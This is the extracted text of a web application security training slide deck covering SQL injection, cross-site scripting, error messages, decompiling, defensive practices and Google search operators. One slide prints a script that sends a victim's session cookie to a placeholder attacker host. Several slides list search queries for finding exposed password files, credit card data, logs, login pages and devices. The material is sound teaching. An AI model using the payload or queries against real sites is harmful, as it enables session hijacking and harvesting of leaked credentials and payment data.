4Attack Types Web Application Vulnerabilities (OWASP Top 10) Broken Access ControlBroken Authentication and Session ManagementBuffer OverflowsDenial of ServiceInsecure Configuration ManagementPoor Input ValidationInjection Flaws (SQL Injection)Cross Site Scripting (XSS)Improper Error HandlingInsecure StorageReversing/decompiling
5Attack Types Web Application Vulnerabilities Where can a web application be exploited?Inputs, outputs...Querystrings (www.ezenta.com/file.php?id=34)Form params (&name=sarid&phone= )HTTP HeadersCookiesLocal Files?Anywhere a client has access to parameters
7Attack Types SQL Injection The exploitation of weaknesses in a web application, ultimately enabling users to utlize functionality located within the database server framework.
8Attack Types SQL Injection (Cont.) Who is vulnerable? MS SQLOracleSybaseDB2MySQLMm.Not the fault of the database software but rather the fault of the developers that utilise these databases.
9Attack Types SQL Injection (Cont.) What can happen? Information leakageData manipulation: INSERT, UPDATE, DELETE, …Execution of Stored Procedures (i.e. MSSQL)Data theftWhat would you want if you were the attacker?
10Attack Types SQL Injection (Cont.) How would an attacker launch an attack in an attempt to gain access to a web server/DB server?PrerequisitesSome outbound trafic must be permitted, the user must know which portThe database’s user must be able to execute the EXEC commandThe attacker must have some server (TFTP/FTP) from shich files can be retrieved
17Web application Security Cross Site Scripting (XSS)
18Attack Types Cross Site Scripting (XSS) Attack aimed at the users of a web application, possible as a result of poor programming practices.
19Attack Types Cross Site Scripting (Cont.) Two types: Transient: The exploit is composed and delivered. Is generally executed just the one time.Persistent: The exploit is composed and written to some data store. An example is a forum post.
20Attack Types Cross Site Scripting (Cont.) Transient: The victim has to perform an action in order for the attack to work.Click on a linkDownload a file (eMule, Kazaa, Skype, MSN, …)Persistent: The attacked is executed simply by visiting the compromised web application.
21Attack Types Cross Site Scripting (Cont.) So you can execute some script in the user’s browser, who cares? Right?
22Attack Types Cross Site Scripting (Cont.) What can happen? Information known only to the user and the web server ( in this case session identifiers ) can be stolen. Sound scary? Consider this....Ordering perscriptions over the net?Medical test results?On-line psychological consultations: Are you sure you’re chatting to a doctor?Using netbank?
23Attack Types Cross Site Scripting (Cont.) Net Bank Recently found a vulnerability that would enable an attacker to create a false net bank logon. When the user entered their username and password, the details were sent to a third server.This is real!
24Attack Types Cross Site Scripting (Cont.) Who is vulnerable? JAVA.NETASPPHPCFMm.It’s not MS’, Sun’s, Allaire’s or Novell’s fault (not always). It’s the fault of the developer!
25Attack Types Cross Site Scripting (Cont.) How do users’ sessions get hijacked?A vulnerability is identified.An exploit is developed (as shown on next slide).The exploit is sent to the victim (transient) or posted in a vulnerable page (persistant).The user clicks on the link (tansient) or visits the vulnerable page (persistant).The user’s session identifier is sent to the attacker.The stolen session identifier is included in the attacker’s request ( shown in the demo ).
26Attack Types Cross Site Scripting (Cont.) A simple transient XSS attack:<script> window.open('http://<ATTACKER>/write_to_file.o?Session='+document.cookie,'obj_window','fullscreen=no,toolbar=no,status=no,menubar=no,scrollbars=no,resizable=yes,directories=no,location=no,width=100,height=100'); </script> All on one line.
All on one line.",
27Attack Types Cross Site Scripting (Cont.) How do users’ sessions get hijacked?A vulnerability is identified.An exploit is developed.The exploit is sent to the victim (transient) or posted in a vulnerable page (persistant).The user clicks on the link (tansient) or visits the vulnerable page (persistant).The user’s session identifier is sent to the attacker.The stolen session identifier is included in the attacker’s request ( shown in the demo ).
32Attack Types Cross Site Scripting (Cont.) How do users’ sessions get hijacked?A vulnerability is identified.An exploit is developed.The exploit is sent to the victim (transient) or posted in a vulnerable page (persistant).The user clicks on the link (tansient) or visits the vulnerable page (persistant).The user’s session identifier is sent to the attacker.The stolen session identifier is incorporated into the attacker’s request ( shown in the demo ).
40Attack Types Improper Error Handling Reading error messages in an attempt to gain an understanding of the platform and technologies deployed
41Attack Types Improper Error Handling (Cont.) What can you learn from error messages?What database is being usedIf the developers are trying to hide what server side technology is being used (by associating *.abc files with the asp.dll), it can be disclosed hereUsernames and passwords included in the connection string
48Attack Types Reversing/decompiling Java and .NET can be decompiled The source code can be readWhat tools exist to enable this?Java: DJ Decompiler.NET: Salamander (http://www.remotesoft.com/salamander/)
49Attack Types Reversing/decompiling (cont.) Differences between native code and VMNative code = ASMJava/.NET = the original codeNative code DEMOJava/.NET DEMO
50Attack Types Reversing/decompiling (cont.) Protection schemes for native codeASProtectExeShieldACProtectorArmadilloExeCrypterPElockCan they then be broken?It seem like itWhat does the file now look like?
51Attack Types Reversing/decompiling (cont.) Protection schemes for Java/.NETObfuscationHASPCan they then be broken?What does the file now look like?
52Attack Types Reversing/decompiling (cont.) What protection schemes do you use?Do they work?
54What can be done? Who is responsible? Customers can make demands! Development houses can educate developers!
55What can be done?DesignThreat Modelling; Understanding the threats (covered on day 2):”But we don’t use sessions””But we use SSL”Code Reviews (briefly covered on day 2)Ask questions!Check listsDefence in depthSecure defaults
56What can be done? Implementation Secure programming principles and practices, educate developers (Think like an attacker)Input validationOutput validation/encodingFail safelyPerform peer code reviewsReuse code that is know to be secure.....
57What can be done?AuditPerform automated testing as well as manual (some of the tools available are covered on day two)Test at every development stageMake a test planTest all components
58What can be done? Configuration Management The secure configuration of the implemented platform (covered on day 2)
59Web application Security Web applications and Google
61Web applications and Google Googles’ advanced search operators (cont.)Query Modifiers (cont.)filetype:docext:php (same as above)inanchor:funnystuff (<a href=target>funnystuff</a>)numrange: ordaterange: (represented in Julian time)phonebook:first last state
62Web applications and Google What can you use this for?Error messages as shown earlierPassword filesLogin pagesLogsShopping informationOnline devicesSource code?
63Web applications and Google Error messages as shown earlierTry and find error messages that you are familiar with by using Googles’ advanced operators
64Web applications and Google Error messages as shown earlier“A syntax error has occurred” filetype:ihtml“Incorrect syntax near””Internal Server Error” ”server at”
65Web applications and Google Password filesTry and find some password details using Google
66Web applications and Google Password filesintitle:”index of /etc” intext:(passwd | shadow)inurl:admin ext:(mdb | log | pwd | tmp | txt | bak) intext:”your password is *”intext:”please use the following username * and password *”
67Web applications and Google Login pagesFind some login pages that you are familiar with
68Web applications and Google Login pagesallinurl:login admin cms"You have requested access to a restricted area of our website. Please authenticate yourself to continue.“intitle:"Tomcat Server Administration"
69Web applications and Google LogsFind some common log files using Google
70Web applications and Google Logsinurl:log ext:(log | txt)inurl:admin ext:(log | txt) intitle:"index.of./“allinurl:logs ftp security
71Web applications and Google Shopping informationShopping information exists on web sites and Google knows about it. Find it!
72Web applications and Google Shopping informationinurl:shop databaseMastercard ext:(log | mdb | tmp | bak | txt)Visa ext:(log | mdb | tmp | bak | txt)Amex ext:(log | mdb | tmp | bak | txt)
73Web applications and Google Online devicesDo you use any online devices like WAPs? Find some online devices you are familiar with.
74Web applications and Google Online devicesintitle:"Live View / - AXIS”intitle:webeye inurl:login.mlinurl:"printer/main.html" intext:"settings”intitle:"Network Storage Link for USB 2.0 Disks" Firmware (http://173016th.com/)
75Web applications and Google Source CodeFind source code fragments with Google
76Web applications and Google Source Codeintext:"ADODB.Recordset" ext:incinurl:index.php.bak
77Web application Security SummaryBad programming can introduce huge issuesSecurity awareness and education can help raise securityGoogle can be used for data mining Keep your environment clean.